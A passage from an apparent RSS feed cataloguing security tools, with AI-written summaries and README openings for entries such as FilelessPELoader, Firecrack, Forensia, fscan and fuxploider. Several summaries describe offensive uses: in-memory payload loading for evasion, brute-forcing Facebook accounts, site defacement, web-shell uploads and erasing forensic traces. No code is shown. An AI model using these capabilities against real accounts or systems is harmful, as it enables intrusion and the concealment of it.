&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FeatherDuster is a cryptographic analysis tool designed to facilitate the identification and exploitation of weaknesses in cryptosystems, leveraging its underlying library, Cryptanalib. It offers capabilities for automatic encoding detection and decoding, interaction with multiple ciphertext formats, and supports various cryptographic analysis functions, making it suitable for both researchers and practitioners in the field of cryptography. The tool aims to simplify the process of analyzing flawed cryptographic implementations, while Cryptanalib serves as a flexible engine for developing custom crypto attack methods.&lt;/p&gt;</description></item><item><title>fernflower</title><link>https://rainmana.github.io/hackyfeed/tools/jetbrains-fernflower/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jetbrains-fernflower/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fernflower is an analytical decompiler for Java, capable of converting compiled Java class files back into human-readable source code. It is integrated within IntelliJ IDEA for debugging and navigation, and can also be executed from the command line to decompile class files, ZIPs, and JARs, offering numerous customizable command-line options to fine-tune the decompilation process. Notable features include support for decompiling inner classes, handling generic signatures, and options for renaming identifiers based on debugging information.&lt;/p&gt;</description></item><item><title>FilelessPELoader</title><link>https://rainmana.github.io/hackyfeed/tools/saadahla-filelesspeloader/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/saadahla-filelesspeloader/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FilelessPELoader is a tool designed to load and execute AES-encrypted Portable Executable (PE) files directly into memory, bypassing the need for traditional file storage. Its primary use case is to facilitate stealthy execution of payloads in memory, enhancing evasion techniques commonly utilized in cybersecurity attacks. Notable features include the ability to decrypt the PE file in-memory and execute it without leaving traces on disk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="filelesspeloader"&gt;FilelessPELoader&lt;/h1&gt;
&lt;p&gt;Loading Remote AES Encrypted PE in memory , Decrypted it and run it&lt;/p&gt;</description></item><item><title>FinalRecon</title><link>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-finalrecon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thewhiteh4t-finalrecon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FinalRecon is an automated web reconnaissance tool designed to efficiently gather comprehensive information about a target in a short time, maintaining high accuracy without the overhead of multiple dependencies. Notable features include detailed data collection on headers, WHOIS, SSL certificate information, DNS enumeration, subdomain and directory enumeration, web crawling, and a port scanning functionality, all in one compact solution. This tool is especially useful for OSINT practitioners seeking quick and reliable data during the reconnaissance phase of security assessments.&lt;/p&gt;</description></item><item><title>Findomain</title><link>https://rainmana.github.io/hackyfeed/tools/findomain-findomain/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/findomain-findomain/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Findomain is a comprehensive domain recognition tool designed for efficient subdomain enumeration and monitoring. It utilizes Certificate Transparency Logs and various APIs to discover subdomains without brute-force methods, supports multi-threading for quick searches, and offers integration with notification services such as Discord and Slack. Notable features include DNS over TLS support, parallel resolution capabilities, and extensive configuration options across multiple formats.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://twitter.com/edu4rdshl"&gt;&lt;img src="https://img.shields.io/twitter/follow/edu4rdshl.svg?logo=twitter" alt="Follow on Twitter"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/FindomainApp"&gt;&lt;img src="https://img.shields.io/twitter/follow/FindomainApp.svg?logo=twitter" alt="Follow on Twitter"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://travis-ci.org/edu4rdshl/findomain"&gt;&lt;img src="https://travis-ci.org/edu4rdshl/findomain.svg?branch=master" alt="Travis CI Status"&gt;&lt;/a&gt;
&lt;a href="https://ci.appveyor.com/project/edu4rdshl/findomain"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/github/edu4rdshl/findomain?branch=master&amp;amp;svg=true" alt="Appveyor CI Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Edu4rdSHL/findomain/actions"&gt;&lt;img src="https://github.com/Edu4rdSHL/findomain/workflows/Github%20Actions/badge.svg" alt="Build status"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Firecrack</title><link>https://rainmana.github.io/hackyfeed/tools/ranginang67-firecrack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ranginang67-firecrack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Firecrack is a multi-functional penetration testing tool designed for exploiting vulnerabilities in websites and Facebook accounts. Its primary use cases include executing brute force attacks on Facebook accounts, finding administrative panels, performing Bing dorking for domain collection, and facilitating website defacement using the file upload method. Notable features include the ability to conduct random attacks on multiple Facebook accounts and an integrated admin finder tool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="firecrack-fire"&gt;Firecrack :fire:&lt;/h1&gt;
&lt;p&gt;What is firecrack tools ?
Firecrack tools are tools for testing and testing on websites or Facebook accounts, conducting&lt;br&gt;
testing on hundreds of Facebook accounts with random accounts and random wordlist, and there are&lt;br&gt;
for testing websites, such as admin finder and deface with file upload method, and Bing dorking&lt;br&gt;
to collect Many domains, Bing Dorking is useful if you are collecting a lot of domains.&lt;br&gt;
more tools: :point_down:&lt;br&gt;
&lt;br&gt;firecrack fiture:&lt;br&gt;&lt;/p&gt;</description></item><item><title>FISSURE</title><link>https://rainmana.github.io/hackyfeed/tools/ainfosec-fissure/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ainfosec-fissure/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FISSURE is an open-source RF framework designed for signal understanding and reverse engineering, catering to both operational and educational needs. It enables users to detect, classify, and manipulate RF signals, perform automated vulnerability testing, and integrate with TAK for real-time situational awareness. Key features include support for various deployment options, from desktop GUIs to headless nodes, and a robust plugin ecosystem for enhanced functionality.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="fissure---the-rf-framework"&gt;FISSURE - The RF Framework&lt;/h1&gt;
&lt;img src="https://rainmana.github.io/hackyfeed/docs/Icons/README/logo.png"&gt;
&lt;p&gt;&lt;strong&gt;Frequency Independent SDR-based Signal Understanding and Reverse Engineering&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>flare-emu</title><link>https://rainmana.github.io/hackyfeed/tools/mandiant-flare-emu/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mandiant-flare-emu/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; flare-emu is an advanced emulation tool that integrates with binary analysis frameworks such as IDA Pro or Radare2, leveraging the Unicorn emulation framework to facilitate flexible and efficient code analysis. It offers multiple interfaces for emulating instruction ranges, iterating through function paths, and handling complex emulation scenarios, making it suitable for deep analysis of executable binaries across various architectures including x86, ARM, and their 64-bit counterparts. Notably, it provides functionalities for user-defined hooks, direct memory manipulation, and dynamic code discovery, enhancing the analyst&amp;rsquo;s ability to probe and understand obfuscated or complex binaries.&lt;/p&gt;</description></item><item><title>flask-session-cookie-manager</title><link>https://rainmana.github.io/hackyfeed/tools/noraj-flask-session-cookie-manager/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noraj-flask-session-cookie-manager/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Flask Session Cookie Manager is a Python tool that encodes and decodes Flask session cookies, facilitating easier management of session data. It offers commands for encoding session information into a cookie format and decoding existing cookies back into a readable structure, with support for both Python 2 and 3. Notable features include optional secret key usage for secure operations and clear command-line arguments for encoding and decoding tasks.&lt;/p&gt;</description></item><item><title>FLIRTDB</title><link>https://rainmana.github.io/hackyfeed/tools/maktm-flirtdb/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/maktm-flirtdb/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FLIRTDB is a repository for storing and sharing signature files generated using the Fast Library Identification and Recognition Technology (FLIRT) used by IDA for identifying and renaming known library subroutines in disassembled binaries. Its primary use case is to alleviate the challenges faced by reverse engineers who require signature files for various library versions that may not be provided by Hex-Rays, allowing for easier analysis of symbol-stripped binaries. Notable features include community contributions for generating and organizing signatures, support for conflict management, and adherence to ethical submission guidelines.&lt;/p&gt;</description></item><item><title>flowsint</title><link>https://rainmana.github.io/hackyfeed/tools/reconurge-flowsint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reconurge-flowsint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Flowsint is an open-source OSINT graph exploration tool designed to facilitate ethical investigations by visualizing relationships between entities in a graph format. Its primary use case is in reconnaissance tasks, providing a suite of automated enrichers for domains, IPs, social media, organizations, and more, thus allowing users to gather comprehensive intelligence efficiently while ensuring data privacy by storing everything locally. Notable features include advanced enrichers for domain and IP investigations, as well as integrations for broader workflow connectivity.&lt;/p&gt;</description></item><item><title>fofa_viewer</title><link>https://rainmana.github.io/hackyfeed/tools/wgpsec-fofa_viewer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wgpsec-fofa_viewer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fofa Viewer is a user-friendly FOFA client developed in JavaFX, designed for cybersecurity professionals to efficiently search for vulnerabilities on target websites using the FOFA search engine. Key features include multi-tab query result display, Excel export capabilities, intelligent input suggestions, and advanced functionalities such as certificate conversion and exclusion of honeypots for premium members. This tool streamlines the information gathering process for penetration testers with its robust API integration and customizable configurations.&lt;/p&gt;</description></item><item><title>Forensia</title><link>https://rainmana.github.io/hackyfeed/tools/paulnorman01-forensia/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/paulnorman01-forensia/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Forensia is an anti-forensics tool designed for red teamers to eliminate traces during the post-exploitation phase. Its primary use case is to enhance evasion by supporting various functionalities such as unloading Sysmon drivers, employing the Gutmann method for file shredding, and disabling multiple logging mechanisms. Notable features include log erasure, file melting capabilities, and the ability to clear recent user activity and cache, thereby reducing the likelihood of detection by incident response teams.&lt;/p&gt;</description></item><item><title>Free-Auto-GPT</title><link>https://rainmana.github.io/hackyfeed/tools/intelligenzaartificiale-free-auto-gpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/intelligenzaartificiale-free-auto-gpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Free-Auto-GPT is an open-source implementation of autonomous AI agents like Auto-GPT and BabyAGI, designed to operate without paid APIs, thus enabling users to leverage advanced AI capabilities at no cost. Its notable features include easy integration with the Hugging Face and ChatGPT ecosystems, allowing users to access a variety of AI models without significant hardware requirements or financial constraints. This democratizes AI technology, making it accessible for small businesses and individuals seeking to innovate without hefty investments.&lt;/p&gt;</description></item><item><title>free-one-api</title><link>https://rainmana.github.io/hackyfeed/tools/rockchinq-free-one-api/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rockchinq-free-one-api/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; free-one-api is a flexible API tool that allows users to access various large language model (LLM) reverse engineering libraries via a standard OpenAI API format. Its primary use case is facilitating seamless interactions with multiple LLMs while providing notable features such as automatic load balancing, web UI support, streaming mode, and a heartbeat detection mechanism to ensure reliability. Additionally, it enables contributors to expand its functionality by testing and integrating new adapters.&lt;/p&gt;</description></item><item><title>frida-ios-dump</title><link>https://rainmana.github.io/hackyfeed/tools/alonemonkey-frida-ios-dump/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alonemonkey-frida-ios-dump/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; frida-ios-dump is a tool designed for extracting decrypted IPA files from jailbroken iOS devices. The primary use case involves leveraging Frida to automate the process of dumping application binaries, making it particularly useful for security researchers and developers analyzing iOS applications. Notable features include support for both Python 2.x and 3.x, as well as a straightforward command-line interface for initiating the dump process with either the display name or bundle identifier of the target app.&lt;/p&gt;</description></item><item><title>frida-ios-hook</title><link>https://rainmana.github.io/hackyfeed/tools/noobpk-frida-ios-hook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noobpk-frida-ios-hook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Frida iOS Hook is a Python-based tool designed for dynamic analysis and function hooking of iOS applications through Frida. Its primary use case involves tracing classes and functions, modifying method return values, and providing a suite of commands for process manipulation, memory dumping, and API interception. Notable features include support for both spawn and attach modes, an interactive CLI, and extensive options for script execution and device management.&lt;/p&gt;</description></item><item><title>Frida-Labs</title><link>https://rainmana.github.io/hackyfeed/tools/dere-ad2001-frida-labs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dere-ad2001-frida-labs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Frida-Labs is a repository designed to facilitate learning Frida for Android through a series of structured challenges, ranging from basic setup to intermediate-level tasks. The primary use case is to help users grasp the fundamentals of using Frida by engaging with practical scenarios that involve hooking methods, changing variable values, and native function invocation. Notable features include a variety of challenges, organized solutions, and an emphasis on understanding Frida scripts, making it an ideal starting point for beginners.&lt;/p&gt;</description></item><item><title>frida-scripts</title><link>https://rainmana.github.io/hackyfeed/tools/0xdea-frida-scripts/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xdea-frida-scripts/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The frida-scripts repository provides a collection of instrumentation scripts designed for reverse engineering applications on iOS, Android, and Linux platforms using the Frida tool. Key features include full-featured tracers and enumerators for Objective-C, Java, and Linux binaries, enabling deep analysis and manipulation of app behaviors. The scripts may require customization and are suitable for advanced users involved in mobile and software security research.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="frida-scripts"&gt;frida-scripts&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/0xdea/frida-scripts"&gt;&lt;img src="https://img.shields.io/github/stars/0xdea/frida-scripts.svg?style=flat&amp;amp;color=yellow" alt=""&gt;&lt;/a&gt;
&lt;a href="https://github.com/0xdea/frida-scripts"&gt;&lt;img src="https://img.shields.io/github/forks/0xdea/frida-scripts.svg?style=flat&amp;amp;color=green" alt=""&gt;&lt;/a&gt;
&lt;a href="https://github.com/0xdea/frida-scripts"&gt;&lt;img src="https://img.shields.io/github/watchers/0xdea/frida-scripts.svg?style=flat&amp;amp;color=red" alt=""&gt;&lt;/a&gt;
&lt;a href="https://www.frida.re/"&gt;&lt;img src="https://img.shields.io/badge/frida-17.3.2-violet" alt=""&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/0xdea"&gt;&lt;img src="https://img.shields.io/badge/twitter-%400xdea-blue.svg" alt=""&gt;&lt;/a&gt;
&lt;a href="https://infosec.exchange/@raptor"&gt;&lt;img src="https://img.shields.io/badge/mastodon-%40raptor-purple.svg" alt=""&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;A collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps and more.&lt;/p&gt;</description></item><item><title>fridare</title><link>https://rainmana.github.io/hackyfeed/tools/suifei-fridare/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/suifei-fridare/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fridare is an automation tool for modifying the Frida server on iOS, Android, Linux, and Windows platforms, designed to enhance security and flexibility by allowing users to change server names and ports while bypassing jailbreak detection. The tool features a dual-mode interface, offering both a robust command line and a modern graphical user interface (GUI) based on the Fyne framework, facilitating intuitive server modifications and visual feedback. Notable functionalities include cross-platform support, binary replacement, custom packaging, and dependency management, making it a comprehensive solution for Frida users across different environments.&lt;/p&gt;</description></item><item><title>fscan</title><link>https://rainmana.github.io/hackyfeed/tools/shadow1ng-fscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shadow1ng-fscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fscan is a comprehensive internal network scanning tool designed for automated vulnerability assessment and information gathering. Its primary use case encompasses host discovery, port scanning, credential brute-forcing across various protocols, system vulnerability detection, and web application scanning, including comprehensive support for various databases and frameworks. Notable features include the ability to exploit vulnerabilities such as MS17-010, SSH remote command execution, and the storage of scan results for further analysis.&lt;/p&gt;</description></item><item><title>fsociety</title><link>https://rainmana.github.io/hackyfeed/tools/fsociety-team-fsociety/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fsociety-team-fsociety/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; fsociety is a modular penetration testing framework designed to assist cybersecurity professionals in conducting security assessments. Notable features include a command-line interface with options for retrieving information and suggesting tools, as well as support for installation via pip and Docker. The framework&amp;rsquo;s modular approach allows users to integrate various tools for comprehensive security testing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/fsociety-team/fsociety/main/images/fsociety.png" width="600px" alt="fsociety-team/fsociety" /&gt;
&lt;/p&gt;
&lt;h1 id="fsociety"&gt;fsociety&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://pypi.org/project/fsociety/"&gt;&lt;img src="https://img.shields.io/pypi/v/fsociety?color=orange&amp;amp;logo=pypi&amp;amp;logoColor=orange&amp;amp;style=flat-square" alt="PyPI"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.7%2B-blue?logo=python&amp;amp;style=flat-square" alt="Python Version"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/pypi/dm/fsociety?style=flat-square" alt="PyPI - Downloads"&gt;
&lt;a href="https://hub.docker.com/r/fsocietyteam/fsociety"&gt;&lt;img src="https://img.shields.io/docker/image-size/fsocietyteam/fsociety/latest?style=flat-square" alt="Docker Image Size (tag)"&gt;&lt;/a&gt;
&lt;a href="http://makeapullrequest.com"&gt;&lt;img src="https://img.shields.io/badge/PRs-welcome-organge.svg?logo=git&amp;amp;logoColor=organge&amp;amp;style=flat-square" alt="PRs Welcome"&gt;&lt;/a&gt;
&lt;a href="https://open.vscode.dev/fsociety-team/fsociety"&gt;&lt;img src="https://img.shields.io/badge/VSCode-Open-0098FF?style=flat-square" alt="Open in Visual Studio Code"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/fsociety_team"&gt;&lt;img src="https://img.shields.io/twitter/follow/fsociety_team?color=blue&amp;amp;style=flat-square" alt="Twitter Follow"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>fsociety</title><link>https://rainmana.github.io/hackyfeed/tools/manisso-fsociety/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/manisso-fsociety/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fsociety is a comprehensive penetration testing framework designed to provide a wide array of hacking tools utilized in the Mr. Robot series. It features modules for information gathering, password attacks, wireless testing, exploitation, web hacking, and post-exploitation, all implemented in Python 2, with detailed installation instructions for various platforms, including Docker support. Notable tools included are Nmap, sqlmap, WPScan, and several others tailored for diverse security testing scenarios.&lt;/p&gt;</description></item><item><title>fuxploider</title><link>https://rainmana.github.io/hackyfeed/tools/almandin-fuxploider/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/almandin-fuxploider/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Fuxploider is an open-source penetration testing tool designed to automate the detection and exploitation of vulnerabilities in file upload forms. Its primary use case is to identify permissible file types and effectively upload web shells or malicious files to targeted web servers using optimized techniques. Notable features include support for Python 3.6 and the ability to utilize Docker for installation, providing flexibility across different environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="fuxploider"&gt;fuxploider&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/python-3.6%20%2B-green.svg" alt="Python 3.6"&gt;&lt;/a&gt; &lt;a href="https://raw.githubusercontent.com/almandin/fuxploider/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/badge/license-GPLv3-red.svg" alt="License"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>fuzzDicts</title><link>https://rainmana.github.io/hackyfeed/tools/thekingofduck-fuzzdicts/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thekingofduck-fuzzdicts/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; fuzzDicts is a comprehensive web penetration testing dictionary tool designed for security professionals to enhance fuzzing and brute-force attacks. It features an extensive collection of payloads, username lists, and weak password dictionaries, regularly updated to include specific vulnerabilities across different systems, including Unix and Windows. Notable features include categorized dictionaries for remote code execution, XSS attacks, and various common website directories, making it a valuable resource for security testing and exploitation.&lt;/p&gt;</description></item><item><title>fuzzforge_ai</title><link>https://rainmana.github.io/hackyfeed/tools/fuzzinglabs-fuzzforge_ai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fuzzinglabs-fuzzforge_ai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; FuzzForge AI is an open-source orchestration platform that leverages AI agents to automate security research workflows via the Model Context Protocol (MCP). It enables seamless interaction with containerized security tools, allowing AI agents to discover, chain, and execute tasks for vulnerability assessment and analysis autonomously. Notable features include a hub architecture for tool discovery, support for AI-native workflows, and the capability to create automated pipelines tailored for specific use cases such as firmware vulnerability research or Rust fuzzing.&lt;/p&gt;</description></item><item><title>Galaxy-Bugbounty-Checklist</title><link>https://rainmana.github.io/hackyfeed/tools/0xmaximus-galaxy-bugbounty-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xmaximus-galaxy-bugbounty-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Galaxy Bugbounty Checklist is a comprehensive tool designed to aid bug bounty hunters by providing an organized and detailed checklist of security assessment techniques. It includes specific references for various testing methodologies such as Account Takeover, CSRF Bypass, and OSINT, making it an essential resource for systematic vulnerability evaluation. Notable features include its structured format and accessibility for users to seek assistance directly through the provided contact.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="notes"&gt;Notes&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;Try to make best Bug Bounty Checklist.&lt;/li&gt;
&lt;li&gt;All checklists come with references.&lt;/li&gt;
&lt;li&gt;Feel free to contact me maximus0xday [at] gmail if you have any question.&lt;/li&gt;
&lt;/ul&gt;
&lt;!--- ![bug bou](https://user-images.githubusercontent.com/63053441/121688913-3de40600-cad9-11eb-81b2-33d85ec42b57.jpg) --&gt;
&lt;img src="https://socialify.git.ci/0xmaximus/Galaxy-Bugbounty-Checklist/image?font=KoHo&amp;forks=1&amp;owner=1&amp;pattern=Circuit%20Board&amp;stargazers=1&amp;theme=Dark" alt="Galaxy-Bugbounty-Checklist" width="640" height="320" /&gt;
&lt;p&gt;To do list:&lt;/p&gt;</description></item><item><title>GalaxyBudsClient</title><link>https://rainmana.github.io/hackyfeed/tools/timschneeb-galaxybudsclient/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/timschneeb-galaxybudsclient/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GalaxyBudsClient is an unofficial management tool for Samsung Galaxy Buds, providing users with enhanced control and configuration options via a desktop interface across Windows, macOS, Linux, and Android. Notable features include detailed battery statistics, customizable touch actions, diagnostics and self-tests, and the ability to flash or downgrade firmware, unlocking the full potential of Galaxy Buds devices.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 English | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_chs.md"&gt;中文(简体)&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_cht.md"&gt;中文(繁體)&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_rus.md"&gt;Русский&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_jpn.md"&gt;日本語&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_ukr.md"&gt;Українська&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_kor.md"&gt;한국어&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_cze.md"&gt;Česky&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_tr.md"&gt;Türkçe&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_gr.md"&gt;Ελληνικά&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_pt.md"&gt;Português&lt;/a&gt; | &lt;a href="https://rainmana.github.io/hackyfeed/docs/README_vnm.md"&gt;Tiếng Việt&lt;/a&gt; &lt;br&gt;
 &lt;sub&gt;Attention: readme files are maintained by translators and may become outdated from time to time. For the newest info rely on the English version.&lt;/sub&gt;
&lt;/p&gt;</description></item><item><title>game-hacking</title><link>https://rainmana.github.io/hackyfeed/tools/dsasmblr-game-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dsasmblr-game-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Ultimate Game Hacking Resource&amp;rdquo; repository is a comprehensive compilation of tools and tutorials designed for the reverse engineering of video games. It provides a variety of game hacking tools such as disassemblers, debuggers, and memory scanners, while also serving as a knowledge base for related methodologies and practices. Notably, it continuously updates its resource list, welcoming community contributions to enhance its offerings.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;
 &lt;img src="https://raw.githubusercontent.com/dsasmblr/hacking-online-games/master/resources/guidedhacking-hero.png" /&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;span align="center"&gt;&lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;This repo is sponsored by GuidedHacking.com!&lt;/a&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;h1 id="the-ultimate-game-hacking-resource"&gt;&lt;a href="https://github.com/dsasmblr/game-hacking/"&gt;The Ultimate Game Hacking Resource&lt;/a&gt;&lt;/h1&gt;
